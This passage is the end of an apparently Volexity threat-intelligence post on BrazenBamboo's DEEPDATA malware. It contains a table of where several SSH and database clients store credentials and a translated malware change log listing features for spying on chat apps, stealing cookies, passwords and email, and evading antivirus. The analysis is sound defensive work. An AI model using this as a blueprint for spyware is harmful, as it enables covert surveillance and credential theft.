<tr> <td width="144">SecureCRT</td> <td width="480">On disk, by reading the configuration files</td> </tr> <tr> <td width="144">Putty</td> <td width="480">In registry</td> </tr> <tr> <td width="144">Navicat</td> <td width="480">In registry</td> </tr> <tr> <td width="144">DBeaver</td> <td width="480">On disk, by reading the <code>credentials-config.json</code> file</td> </tr> <tr> <td width="144">Xshell</td> <td width="480">On disk, by reading the sessions files</td> </tr> <tr> <td width="144">Xftp</td> <td width="480">On disk, by reading the sessions files</td> </tr> </tbody> </table> <h3><a id="Appendix2"></a>DEEPDATA Change Log [English Translation]</h3> <blockquote> <p style="font-weight: 400;"><code>{<br /> "count":18, "next":null, "previous":null, "results":[ {<br /> "id":23, "time":"2023-10-1310036", "content":"{\ "title\":\"v3.2\",\"text\":\"1. Add tg local real-time monitoring;\\n2.tg secret capture and add template parameter configuration;\\n3. Repair the obtained Problems with data display;\\n4. Chat software adds telegarm display;\"}"<br /> }, {<br /> "id":22, "time":"2023-06-30151833", "content":"{\"title\ ":\"v3.1\",\"text\":\"1. Opera Browser is added to the browser type\\n2. Yandex module is added to cookie crawler parsing\\n3. Whatapp parsing is redone\\n4. New Added signal chat software\\n5. Evidence collection mode and monitoring mode can be configured in the template\"}"<br /> }, {<br /> "id":21, "time":"2023-05-1218630", "content":"{\ "title\":\"v3.0\",\"text\":\"1. Add a new monitoring version, the client is online in real time, and realize websocket communication;\\n2. Add the function of issuing environmental recording instructions;\ \n3. Add the online command issuance function for other functions; \\n4. Fix the problem of program blocking for continuous command issuance; \\n5. Optimize the recording command issuance interface; \"}"<br /> }, {<br /> "id":20, "time":"2023-01-2917537", "content":"{\"title\":\"V 2.1\",\"text\":\"1. Added data upload display for outlook emails \\n2. Fix a bug in outlook and support Onedrive acquisition.  \\n3. Fixed the process list upload size field out-of-range bug\"}"<br /> }, {<br /> "id":19, "time":"2022-11-1118244", "content":"{\"title\": \"V2.0\",\"text\":\"1. Added target instant messaging software forensic information, including: Enterprise WeChat; forensic content includes session information, session chat content, contact information, and chat files;\" "<br /> }<br /> "},{"id":17,"time":"2022-09-17185754","content":" {<br /> \"title\":\"V1.5.1\",\"text\": \"1. Added the ability to obtain network card and session information; \\n2. Fixed the bug of not being able to go online when the terminal mac is empty; \\n3. Remove batches of local data, drivers, users, and browser passwords; \\n4. Repair Bug in template configuration instructions not being executed;\\n5. Add new specified files (folders) to upload;\\n6. Add export cache files to chat software;\\n7. Add batch export of emails;\\n8. Fix system permission acquisition Bug in wx home directory failure;\"}"<br /> }, {<br /> "id":16, "time":"2022-08-29182530", "content":"{\"title\":\"V1.5\ ", \"text\":\"1. The program supports input parameter acquisition tasks, and adds module configuration, which can build in the default extraction function;\\n2. Modify the execution loading method and use rundll32 for loading;\\n3. Program Encryption processing;\\n4. Simple data extraction through anti-virus processing, loading data.dll through 360, etc.;\\n5. New template configuration function for the website;\\n6. Local data improvement data details: port status, service company Name, process command line parameters, etc.;\\n7. New chat software WhatsApp, zalo;\\n8. Other website bug fixes;\"}"<br /> }, {<br /> "id":15, "time":"2022-07 -1518245", "content":"{\"title\":\"v1.4\",\"text\":\"1. Add local data (service list, port list, user list, process list, Driver list) display\\n2. Fix the problem of incorrect content in downloading email data attachments\\n3. Fix the problem of data exported to csv wps when opening Chinese garbled characters\\n4. Fix the problem of incorrect user names when crawling Yahoo mailboxes\\ n5. Fix the problem of Baidu network disk crawling error\\n6. Fix the problem of JD crawling data not being associated\"}"<br /> }, {<br /> "id":14, "time":"2022-07-0910226", "content":"{\"title\":\"v1.3\",\"text\":\"1. When optimizing the local directory search, when the content contains special characters, the returned content is inaccurate\\n2. Optimize the timeout of deleting old data when re-parsing local directory files, and delete it in the celery task instead\\n3. Fix the problem of chromium browser obtaining mailbox cookies\\n4. Fix the problem of wx.mail.com, WeChat scan The problem of not crawling emails when logging into QQ mailbox with code\\n5. Fix the problem of crawling communication in QQ mailbox\\n6. Optimize file directory acquisition, from only obtaining c:/user to obtaining files under c drive All files outside the system folder\\n\"}"<br /> }, {<br /> "id":12, "time":"2022-07-0116723", "content":"{\"title\":\"v1 .2.6\",\"text\":\"1. Add batch export of chat data including WeChat, Line, DingTalk, Skype, Feishu\\n2. Add batch export of browser data, including browsers History, browser cookies\\n3. Add export task display, export progress, and download functions.  \\n4. Fix the problem of WeChat voice files not being found\\n5. Fix the bug of obtaining the file directory under system permission\\n6. Automatically delete the file version after the output execution program is completed\\n7. Fix the Skype update version modification program Get cookie path\"}"<br /> }, {<br /> "id":11, "time":"2022-06-25101259", "content":"{\"title\":\"v1.2.5\",\" text\":\"1. Optimize the method of skype forensics from directly uploading TOKEN to directly uploading cookie files\\n2.Skype forensic information analysis module adds cookie file parsing operation\\n3. Add target machine file directory information upload, including File size data, supports searching for files or folders in specified directories\\n4. Fix the bug of losing Skype chat records when crawling files/voices/videos and other message records\\n5. Fix the problem of program crash when executing under system permissions\"} "<br /> }, {<br /> "id":10, "time":"2022-06-11122341", "content":"{\"title\":\"v1.2.4\",\"text\":\" 1. New target group management\\n2. New system user management and role management\\n3. New target forensic data deletion, including specific forensic batch data deletion (including data + files), all batch deletion, terminal Delete\"}"<br /> }, {<br /> "id":9, "time":"2022-06-04122318", "content":"{\"title\":\"v1.2.3\",\"text\ ":\"1. New display of travel evidence collection data, including travel account information, order list, common consignee addresses (contact information)\\n2. New display of evidence collection documents, including records of previous evidence collection documents, and the number of evidence collection documents Re-analysis function\\n3. New log audit function, including the operation log of the platform system, the forensic log of the forensic tool, and the analysis log of the forensic file\"}"<br /> }, {<br /> "id":8, "time":" 2022-05-28122318", "content":"{\"title\":\"v1.2.2\",\"text\":\" 1. New target WIFI information collection, including surrounding wifi list, local WIFI password\\n2. Newly added e-commerce forensic data display, including e-commerce account information, order list, common harvest address (contact information)\"}"<br /> }, {<br /> "id":7, "time":"2022 -05-21122318", "content":"{\"title\":\"v1.2.1\",\"text\":\" 1. Added target instant messaging software forensic information, including Feishu and Skype ; Forensic content includes session information, session chat content, contact information, chat files\\n2. New instant messaging data display, including session information, session members, contact (friends) list, chat content, chat files, etc., supported Various commonly used operating functions, such as session retrieval, chat content retrieval (including contextual viewing), chat file retrieval\"}"<br /> }, {<br /> "id":6, "time":"2022-05-14122318", "content ":"{\"title\":\"v.1.1.2\",\"text\":\" 1. Added target instant messaging software forensic information, including Line and DingTalk; forensic content includes session information , session chat content, contact information, chat files\\n2. New browser cookies are added to collect evidence on target network identity data information, including\\n 2.1 E-commerce forensics (such as JD.com, Taobao, Meituan)\\n 2.2 Travel evidence collection (Ctrip, Qunar.com)\\n3. New email forensic data display, including email account information, email folder information, email list, email EML content\"}"<br /> }, {<br /> "id":5, " time":"2022-05-07122318", "content":"{\"title\":\"v1.1.1\",\"text\":\"1. Add target instant messaging software forensic information, Including WeChat; forensic content includes session information, session chat content, contact information, and chat files\\n2. New browser cookies are added to collect evidence on the target network identity data information, including\\n 2.1. Email forensics (such as NetEase email, QQ mailbox, 139 mailbox, 189 mailbox, yahoo mailbox, hotmail mailbox, Gmail mailbox, etc.)\"}"<br /> }, {<br /> "id":4, "time":"2022-04-25122318", "content":"{ \"title\":\"v1.1.0\",\"text\":\"1. Add target basic information collection, including machine name, IP address, Mac address, brand, model, operating system, resolution , memory, CPU, etc.\\n2. Add target browser data information, including browser access records, browser cookie information, browser password information\"}"<br /> }</code></p> <p><code>]</code><br /> <code>}</code></p></blockquote> <p style="font-weight: 400;"> <div class="post-tags"> <a href="https://www.volexity.com/blog/tag/apt/">APT</a>, <a href="https://www.volexity.com/blog/tag/brazenbamboo/">brazenbamboo</a>, <a href="https://www.volexity.com/blog/tag/china/">China</a>, <a href="https://www.volexity.com/blog/tag/exploits/">exploits</a>, <a href="https://www.volexity.com/blog/tag/forticlient/">forticlient</a>, <a href="https://www.volexity.com/blog/tag/fortinet/">Fortinet</a>, <a href="https://www.volexity.com/blog/tag/threat-intelligence/">Threat Intelligence</a> </div> </div> </article> <aside class="sidebar col-sm-4"> <ul class="widgets"> <li class="widget widget_search"><div class="widget-content"><form role="search" method="get" class="search-form" action="https://www.volexity.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="SEARCH" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></div></li> <li class="widget widget_recent_entries"><div class="widget-content"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/">Multiple Russian Threat Actors Targeting Microsoft Device Code Authentication</a> </li> <li> <a href="https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/">The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access</a> </li> <li> <a href="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" aria-current="page">BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA</a> </li> <li> <a href="https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/">StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms</a> </li> <li> <a href="https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/">DISGOMOJI Malware Used to Target Indian Government</a> </li> </ul> </div></li><li class="widget widget_archive"><div class="widget-content"><h4 class="widget-title">Archives</h4> <ul> <li><a href='https://www.volexity.com/blog/2025/02/'>February 2025</a></li> <li><a href='https://www.volexity.com/blog/2024/11/'>November 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/08/'>August 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/06/'>June 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/05/'>May 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/04/'>April 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/02/'>February 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/01/'>January 2024</a></li> <li><a href='https://www.volexity.com/blog/2023/09/'>September 2023</a></li> <li><a href='https://www.volexity.com/blog/2023/06/'>June 2023</a></li> <li><a href='https://www.volexity.com/blog/2023/03/'>March 2023</a></li> <li><a href='https://www.volexity.com/blog/2022/12/'>December 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/08/'>August 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/07/'>July 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/06/'>June 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/03/'>March 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/02/'>February 2022</a></li> <li><a href='https://www.volexity.com/blog/2021/12/'>December 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/08/'>August 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/05/'>May 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/03/'>March 2021</a></li> <li><a href='https://www.volexity.com/blog/2020/12/'>December 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/11/'>November 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/04/'>April 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/03/'>March 2020</a></li> <li><a href='https://www.volexity.com/blog/2019/09/'>September 2019</a></li> <li><a href='https://www.volexity.com/blog/2018/11/'>November 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/09/'>September 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/08/'>August 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/07/'>July 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/06/'>June 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/04/'>April 2018</a></li> <li><a href='https://www.volexity.com/blog/2017/11/'>November 2017</a></li> <li><a href='https://www.volexity.com/blog/2017/07/'>July 2017</a></li> <li><a href='https://www.volexity.com/blog/2017/03/'>March 2017</a></li> <li><a href='https://www.volexity.com/blog/2016/11/'>November 2016</a></li> <li><a href='https://www.volexity.com/blog/2015/10/'>October 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/07/'>July 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/06/'>June 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/04/'>April 2015</a></li> <li><a href='https://www.volexity.com/blog/2014/10/'>October 2014</a></li> <li><a href='https://www.volexity.com/blog/2014/09/'>September 2014</a></li> </ul> </div></li><li class="widget widget_categorizedtagcloudwidget"><div class="widget-content"><h4 class="widget-title">Tags</h4> <div id="categorized-tag-cloud"><span id="categorized-tag-cloud-el-1"><a href="https://www.volexity.com/blog/tag/spear-phishing/" class="tag-cloud-link tag-link-45 tag-link-position-1" style="font-size: 11pt;" aria-label="spear phishing (4 items)">spear phishing</a></span> <span id="categorized-tag-cloud-el-2"><a href="https://www.volexity.com/blog/tag/ivanti-connect-secure/" class="tag-cloud-link tag-link-173 tag-link-position-2" style="font-size: 11pt;" aria-label="ivanti connect secure (4 items)">ivanti connect secure</a></span> <span id="categorized-tag-cloud-el-3"><a href="https://www.volexity.com/blog/tag/vulnerabilities/" class="tag-cloud-link tag-link-34 tag-link-position-3" style="font-size: 11pt;" aria-label="vulnerabilities (4 items)">vulnerabilities</a></span> <span id="categorized-tag-cloud-el-4"><a href="https://www.volexity.com/blog/tag/exploit/" class="tag-cloud-link tag-link-87 tag-link-position-4" style="font-size: 15.5pt;" aria-label="Exploit (13 items)">Exploit</a></span> <span id="categorized-tag-cloud-el-5"><a href="https://www.volexity.com/blog/tag/vpn/" class="tag-cloud-link tag-link-24 tag-link-position-5" style="font-size: 11.8pt;" aria-label="VPN (5 items)">VPN</a></span> <span id="categorized-tag-cloud-el-6"><a href="https://www.volexity.com/blog/tag/scanning/" class="tag-cloud-link tag-link-31 tag-link-position-6" style="font-size: 11pt;" aria-label="Scanning (4 items)">Scanning</a></span> <span id="categorized-tag-cloud-el-7"><a href="https://www.volexity.com/blog/tag/threat-intelligence/" class="tag-cloud-link tag-link-93 tag-link-position-7" style="font-size: 12.5pt;" aria-label="Threat Intelligence (6 items)">Threat Intelligence</a></span> <span id="categorized-tag-cloud-el-8"><a href="https://www.volexity.com/blog/tag/edge-device/" class="tag-cloud-link tag-link-215 tag-link-position-8" style="font-size: 11.8pt;" aria-label="edge device (5 items)">edge device</a></span> <span id="categorized-tag-cloud-el-9"><a href="https://www.volexity.com/blog/tag/apt/" class="tag-cloud-link tag-link-35 tag-link-position-9" style="font-size: 20pt;" aria-label="APT (39 items)">APT</a></span> <span id="categorized-tag-cloud-el-10"><a href="https://www.volexity.com/blog/tag/webshell/" class="tag-cloud-link tag-link-84 tag-link-position-10" style="font-size: 11.8pt;" aria-label="webshell (5 items)">webshell</a></span> <span id="categorized-tag-cloud-el-11"><a href="https://www.volexity.com/blog/tag/rce/" class="tag-cloud-link tag-link-174 tag-link-position-11" style="font-size: 12.5pt;" aria-label="RCE (6 items)">RCE</a></span> <span id="categorized-tag-cloud-el-12"><a href="https://www.volexity.com/blog/tag/pulsesecure/" class="tag-cloud-link tag-link-172 tag-link-position-12" style="font-size: 11pt;" aria-label="pulsesecure (4 items)">pulsesecure</a></span> <span id="categorized-tag-cloud-el-13"><a href="https://www.volexity.com/blog/tag/exploits/" class="tag-cloud-link tag-link-33 tag-link-position-13" style="font-size: 15.1pt;" aria-label="exploits (12 items)">exploits</a></span> <span id="categorized-tag-cloud-el-14"><a href="https://www.volexity.com/blog/tag/phishing/" class="tag-cloud-link tag-link-107 tag-link-position-14" style="font-size: 11pt;" aria-label="phishing (4 items)">phishing</a></span> <span id="categorized-tag-cloud-el-15"><a href="https://www.volexity.com/blog/tag/malware/" class="tag-cloud-link tag-link-106 tag-link-position-15" style="font-size: 11.8pt;" aria-label="malware (5 items)">malware</a></span> <span id="categorized-tag-cloud-el-16"><a href="https://www.volexity.com/blog/tag/0day/" class="tag-cloud-link tag-link-131 tag-link-position-16" style="font-size: 11.8pt;" aria-label="0day (5 items)">0day</a></span> <span id="categorized-tag-cloud-el-17"><a href="https://www.volexity.com/blog/tag/memory-forensics/" class="tag-cloud-link tag-link-65 tag-link-position-17" style="font-size: 11.8pt;" aria-label="memory forensics (5 items)">memory forensics</a></span> <span id="categorized-tag-cloud-el-18"><a href="https://www.volexity.com/blog/tag/north-korea/" class="tag-cloud-link tag-link-117 tag-link-position-18" style="font-size: 11.8pt;" aria-label="North Korea (5 items)">North Korea</a></span> <span id="categorized-tag-cloud-el-19"><a href="https://www.volexity.com/blog/tag/backdoor/" class="tag-cloud-link tag-link-180 tag-link-position-19" style="font-size: 10pt;" aria-label="backdoor (3 items)">backdoor</a></span> <span id="categorized-tag-cloud-el-20"><a href="https://www.volexity.com/blog/tag/china/" class="tag-cloud-link tag-link-42 tag-link-position-20" style="font-size: 14.4pt;" aria-label="China (10 items)">China</a></span> </div> <style> #categorized-tag-cloud a, #categorized-tag-cloud a:visited { text-decoration:none; } #categorized-tag-cloud a:hover { text-decoration:none; color:#3b97d3; } #categorized-tag-cloud-el-1 a, #categorized-tag-cloud-el-1 a:visited { color:#555555; } #categorized-tag-cloud-el-2 a, #categorized-tag-cloud-el-2 a:visited { color:#555555; } #categorized-tag-cloud-el-3 a, #categorized-tag-cloud-el-3 a:visited { color:#555555; } #categorized-tag-cloud-el-4 a, #categorized-tag-cloud-el-4 a:visited { color:#555555; } #categorized-tag-cloud-el-5 a, #categorized-tag-cloud-el-5 a:visited { color:#555555; } #categorized-tag-cloud-el-6 a, #categorized-tag-cloud-el-6 a:visited { color:#555555; } #categorized-tag-cloud-el-7 a, #categorized-tag-cloud-el-7 a:visited { color:#555555; } #categorized-tag-cloud-el-8 a, #categorized-tag-cloud-el-8 a:visited { color:#555555; } #categorized-tag-cloud-el-9 a, #categorized-tag-cloud-el-9 a:visited { color:#555555; } #categorized-tag-cloud-el-10 a, #categorized-tag-cloud-el-10 a:visited { color:#555555; } #categorized-tag-cloud-el-11 a, #categorized-tag-cloud-el-11 a:visited { color:#555555; } #categorized-tag-cloud-el-12 a, #categorized-tag-cloud-el-12 a:visited { color:#555555; } #categorized-tag-cloud-el-13 a, #categorized-tag-cloud-el-13 a:visited { color:#555555; } #categorized-tag-cloud-el-14 a, #categorized-tag-cloud-el-14 a:visited { color:#555555; } #categorized-tag-cloud-el-15 a, #categorized-tag-cloud-el-15 a:visited { color:#555555; } #categorized-tag-cloud-el-16 a, #categorized-tag-cloud-el-16 a:visited { color:#555555; } #categorized-tag-cloud-el-17 a, #categorized-tag-cloud-el-17 a:visited { color:#555555; } #categorized-tag-cloud-el-18 a, #categorized-tag-cloud-el-18 a:visited { color:#555555; } #categorized-tag-cloud-el-19 a, #categorized-tag-cloud-el-19 a:visited { color:#555555; } #categorized-tag-cloud-el-20 a, #categorized-tag-cloud-el-20 a:visited { color:#555555; } </style></div></li> </ul> </aside> </section> </div> </main> <footer class="footer"> <div class="footer-container container"> <div class="footer-col-first col-md-3 no-padding"> <a class="footer-logo" href="https://www.volexity.com"><img src="https://www.volexity.com/wp-content/themes/volexity/dist/images/logo.png" alt="Volexity"></a> <address class="footer-copyright">&copy; 2025 Volexity. All Rights Reserved.</address> </div> <ul id="menu-footer-menu" class="footer-menu-list col-md-4 col-xs-12"><li id="menu-item-57" class="nav-header menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-57"><a href="/company/about/">About</a> <ul class="sub-menu"> <li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://www.volexity.com/company/about/">About Us</a></li> <li id="menu-item-58" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-58"><a href="https://www.volexity.com/blog/">Blog</a></li> <li id="menu-item-395" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-395"><a href="https://www.volexity.com/privacy-policy/">Privacy Policy</a></li> </ul> </li> <li id="menu-item-60" class="nav-header menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-60"><a href="/solutions/">Solutions</a> <ul class="sub-menu"> <li id="menu-item-400" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-400"><a href="https://www.volexity.com/company/contact/">Request A Demo</a></li> <li id="menu-item-61" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-61"><a href="https://www.volexity.com/products-overview/">Products</a></li> <li id="menu-item-669" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-669"><a href="https://www.volexity.com/services-overview/">Services</a></li> </ul> </li> </ul> <div class="footer-address col-md-3 col-xs-12"> <p class="footer-header">Contact</p> <ul> <li class="footer-address--address icon-location-marker"> 11654 Plaza America Dr #774<br /> Reston, VA 20190-4700 </li> <li class="footer-address--phone icon-phone-mobile">1-888-825-1975</li> </ul> </div> <div class="footer-social col-md-2 no-padding"> <p class="footer-header">Connect</p> <ul> <li class="footer-social-holder"><a href="https://www.facebook.com/volexity" target="_blank" class="icon-facebook footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://twitter.com/volexity" target="_blank" class="icon-twitter footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://www.linkedin.com/company/volexity" target="_blank" class="icon-linkedin footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://infosec.exchange/@volexity" target="_blank" class="fa-mastodon footer-social--link"></a></li> </ul> </div> </div> <div id="back-to-top" class="icon-slide-left"></div> <script type="text/javascript" id="main-js-extra"> /* <![CDATA[ */ var urls = {"base":"https:\/\/www.volexity.com","theme":"https:\/\/www.volexity.com\/wp-content\/themes\/volexity","ajax":"https:\/\/www.volexity.com\/wp-admin\/admin-ajax.php"}; var info = []; /* ]]> */ </script> <script type="text/javascript" src="https://www.volexity.com/wp-content/themes/volexity/dist/scripts/scripts.min.js?ver=6.7" id="main-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/comment-reply.min.js?ver=6.7" id="comment-reply-js" async="async" data-wp-strategy="async"></script> <!-- Cookie Notice plugin v2.4.18 by Hu-manity.co https://hu-manity.co/ --> <div id="cookie-notice" role="dialog" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: rgba(0,0,0,1);"><div class="cookie-notice-container" style="color: #fff"><span id="cn-notice-text" class="cn-text-container">This Website uses cookies, which are necessary to its functioning and required to achieve the purposes illustrated in our <a href="/privacy-policy/#cookies">Cookie Policy</a>. By clicking the button, you consent to our use of cookies.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button cn-button-custom box-cta" aria-label="Agree &amp; Close">Agree &amp; Close</a></span><span id="cn-close-notice" data-cookie-set="accept" class="cn-close-icon" title="No"></span></div> </div> <!-- / Cookie Notice plugin --></footer></body> </html>